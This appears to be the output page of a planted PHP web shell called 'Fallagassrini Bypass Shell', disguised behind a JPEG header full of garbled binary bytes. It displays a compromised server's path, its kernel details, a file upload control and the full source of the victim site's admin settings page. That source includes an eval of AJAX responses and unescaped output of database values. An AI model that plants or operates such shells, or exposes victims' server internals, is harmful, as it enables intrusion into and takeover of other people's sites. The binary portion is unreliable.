JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/jpewexports/www/application/views/admin/

Linux 43-225-53-84.webhostbox.net 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01 UTC 2023 x86_64
Upload File :
Current File : /home/jpewexports/www/application/views/admin/settings.php

<?php
$p_title="settings";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
    <title>Edit Settings | KIRAMIVER</title>
    <link rel="shortcut icon" href="<?php echo base_url(); ?>favicon.ico" />

    <link rel="stylesheet" href="<?php echo base_url(); ?>css/admin/style.css" media="all" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/jquery-ui/css/smoothness/jquery-ui-1.8.15.custom.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/harvesthq-chosen/chosen.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/elfinder/css/elfinder.full.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/fancybox/jquery.fancybox-1.3.4.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo base_url(); ?>lib/file-uploader/fileuploader.css" type="text/css" />
    <link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Open+Sans" type="text/css" />

    <script type="text/javascript" src="<?php echo base_url(); ?>js/admin/head.load.min.js"></script>
     <script type="text/javascript" src="<?php echo base_url(); ?>ckeditor/ckeditor.js"></script>
<script type="text/javascript" language="javascript">
 .hiddenMenu {
        display: none;
              }

</script>


<script type="text/javascript" src="<?php echo base_url(); ?>js/admin/ajax.js"></script>
<script type="text/javascript">
	
	var ajax = new Array();

function getCityList(sel)
{
	//alert("hjghj");

	var base_url='<?php echo base_url(); ?>';
	var countryCode = sel.options[sel.selectedIndex].value;
	
	document.getElementById('district').options.length = 0;	// Empty city select box
	
	if(countryCode.length>0){
		var index = ajax.length;
		ajax[index] = new sack();
	//	alert(countryCode);
		//alert(base_url);
		ajax[index].requestFile = base_url+"getcat/index/"+countryCode;	// Specifying which file to get
		
		ajax[index].onCompletion = function(){ createCities(index) };	
		// Specify function that will be executed after file has been found
		ajax[index].runAJAX();		// Execute AJAX function
		
		
	}
}

 function createCities(index)
 {
 	//alert(index);
 	//alert(ajax[index].response);
 	
	var obj = document.getElementById('district');
	//alert("sds");
	//alert(ajax[index].response);
	eval(ajax[index].response);	// Executing the response from Ajax as Javascript code	
 } 
</script>
</script>




</head>
<body >

    
	<?php
	//include("header.php");
	?>

	<div id="main">
		<div class="wrapper">
			<div id="main_section" class="cf brdrrad_a">

				
					
                  <?php
				  $sql_settings=$this->db->query("select * from tbl_settings where id='1'");
				  $row_settings=$sql_settings->row_array();
				  ?>
				

				<div id="content_wrapper">
					<div id="main_content" class="cf" style="margin-left:15px;">
						<form action="<?php echo base_url(); ?>admin/settings/update" method="post" class="formEl" id="form_static" enctype="multipart/form-data">
							<div class="cf sepH_c">
								<div id="content_actions" class="fr">
									<button class="btn btn_d" type="submit" name="update" >Save</button>
                             
							
								</div>
								<h1 class="fl">Settings</h1>
							</div>

							

							<div class="msg_box msg_error" id="form_a_errors" style="display:none"></div>

							<div class="content_panes">

								<div id="tab-1">

									<div class="formEl_a">

										<fieldset>
											<legend>You can change settings Here...</legend>
											<div class="sepH_b">
												<label for="title" class="lbl_a">Title</label>
					<input type="text" id="title" name="title" class="inpt_a" value="<?php echo $row_settings['title']; ?>" />
												<span class="f_help">Here you can enter a headline.</span>
											</div>
                                            
                                            <div class="sepH_b">
												<label for="title" class="lbl_a">Email</label>
					<input type="text" id="email" name="email" class="inpt_a" value="<?php echo $row_settings['email']; ?>" />
												
											</div>
                                            
                                            <div class="sepH_b">
												<label for="title" class="lbl_a">URL</label>
					<input type="text" id="url" name="url" class="inpt_a" value="<?php echo $row_settings['url']; ?>" />
												
											</div>
                                            
                                            <div class="sepH_b">
												<label for="title" class="lbl_a">Logo</label>
					<input type="file" id="logo" name="logo" class="inpt_a" value="<?php echo $row_settings['logo']; ?>" />
                    <img src="<?php echo base_url();?>system/application/views/images/<?php echo $row_settings['logo']; ?>" height="40" width="40" />
												
											</div>
                                           <!-- <div class="sepH_c cf">
												<label for="text" class="lbl_a">Maintenance</label>
                                                
                                   <input type="text" id="maintenance" name="maintenance" class="inpt_a" value="<?php //echo $row_settings['maintenance']; ?>" />
							
											</div>-->
                                            <fieldset style="width:355px;">
											<legend>Maintenance...</legend>
											<div class="cf">
												<div class="dp33">
													<input type="radio" name="radioInput" id="enable" class="inpt_r" <?php if($row_settings['maintenance']==1) echo "checked"; ?> value="1" />
													<label for="radio_1" class="lbl_c">Enable</label>
													
												</div>
												<div class="dp33">
													<input type="radio" name="radioInput" id="disable" class="inpt_r"  <?php if($row_settings['maintenance']==0) echo "checked"; ?> value="0" />
													<label for="radio_2" class="lbl_c">Disable</label>
													
												</div>
												
											</div>
										</fieldset>
                                            
                                            

											<div class="sepH_c cf">
												<label for="text" class="lbl_a">Welcome Note</label>
                                                
                                               <textarea name="welcome_note" id="text" cols="30" rows="10" class="ckeditor" style="display: block;"><?php echo $row_settings['welcome_note']; ?></textarea>
				
											</div>
                                            
                                             <div class="sepH_c cf">
												<label for="text" class="lbl_a">SEO Keyword</label>
                                                
                                         <textarea name="keyword" id="text" cols="20" rows="20"><?php echo $row_settings['keyword']; ?></textarea>
				
											</div>
                                                                                     
                                            
											<div class="sepH_c cf">
												<label for="text" class="lbl_a">SEO Description</label>
                                                
                                         <textarea name="description" id="text" cols="50" rows="30" style="display: block; height:170px;"><?php echo $row_settings['description']; ?></textarea>
				
											</div>
                                            
                                  
                                            
                                            
										</fieldset>

									</div>

									

									
								</div>

								

							</div>
						</form>
					</div>
				</div>

				

			</div>
		</div>
	</div>

	

	<script type="text/javascript">
		head.js(
			"<?php echo base_url(); ?>js/admin/jquery-1.6.2.min.js",
			"<?php echo base_url(); ?>lib/jquery-ui/jquery-ui-1.8.15.custom.min.js",
			"<?php echo base_url(); ?>lib/harvesthq-chosen/chosen.jquery.min.js",
			"<?php echo base_url(); ?>lib/fusion-charts/FusionCharts.js",
			"<?php echo base_url(); ?>lib/fancybox/jquery.easing-1.3.pack.js",
			"<?php echo base_url(); ?>lib/fancybox/jquery.fancybox-1.3.4.pack.js",
			"<?php echo base_url(); ?>lib/file-uploader/fileuploader.js",
			"<?php echo base_url(); ?>lib/tiny-mce/jquery.tinymce.js",
			"<?php echo base_url(); ?>js/admin/jquery.microaccordion.js",
			"<?php echo base_url(); ?>js/admin/jquery.tools.min.js",
			"<?php echo base_url(); ?>js/admin/jquery.stickyPanel.js",
			"<?php echo base_url(); ?>js/admin/xbreadcrumbs.js",
			"<?php echo base_url(); ?>lib/jquery-validation/jquery.validate.js",
			"<?php echo base_url(); ?>js/admin/lagu.js",
			function(){
				lga_fusionCharts.chart_k();
				lga_flowTabs.tabs_b();
				lga_selectBox.init();
				lga_datepicker.init();
				lga_editor.init();
				lga_sticky.sticky_contentActions();
				lga_clearForm.init();
				lga_form_a_validation.init();
			}
		)
    </script>

</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net